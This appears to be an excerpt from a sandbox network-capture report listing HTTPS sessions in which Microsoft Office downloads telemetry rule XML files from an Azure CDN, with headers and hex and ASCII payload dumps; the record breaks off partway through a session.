                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    85192.168.2.56045313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:33 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                    x-ms-request-id: dbd91de3-001e-002b-2827-2799f2000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120833Z-r197bdfb6b46kmj4701qkq602400000005kg000000005rxs
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    86192.168.2.56045213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:33 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                    x-ms-request-id: f9fbd553-601e-003e-5c2e-273248000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120833Z-16849878b78zqkvcwgr6h55x9n00000005ug00000000gr8t
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    87192.168.2.56045713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:34 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                    x-ms-request-id: 4f86bdfb-c01e-00ad-5e84-25a2b9000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120834Z-15b8d89586fzhrwgk23ex2bvhw00000009d000000000561k
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    88192.168.2.56045813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:34 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 174
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                    x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120834Z-16849878b785dznd7xpawq9gcn00000007y0000000005bhd
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    89192.168.2.56045913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:34 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1952
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                    x-ms-request-id: ba33cc4f-e01e-0052-2e6f-28d9df000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120834Z-15b8d89586fdmfsg1u7xrpfws00000000arg0000000078p3
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    90192.168.2.56045613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:34 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 405
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                    x-ms-request-id: 8a3f5c5e-301e-000c-55dc-26323f000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120834Z-17c5cb586f6fqqst87nqkbsx1c00000004xg000000004rzu
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    91192.168.2.56045540.69.42.241443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:34 UTC142OUTGET /clientwebservice/ping HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    User-Agent: DNS resiliency checker/1.0
                                                                                                                                                                                                                                                    Host: fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC234INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:35 GMT
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    92192.168.2.56046013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 958
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                    x-ms-request-id: 080ba15e-001e-0082-732b-275880000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120835Z-16849878b78j5kdg3dndgqw0vg000000088g000000004z6e
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    93192.168.2.56046113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 501
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                    x-ms-request-id: 218b1b25-701e-005c-4b21-26bb94000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120835Z-r197bdfb6b466qclztvgs64z10000000081g000000007zus
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    94192.168.2.56046213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:35 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 2592
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                    x-ms-request-id: 6768b437-a01e-00ab-174d-279106000000
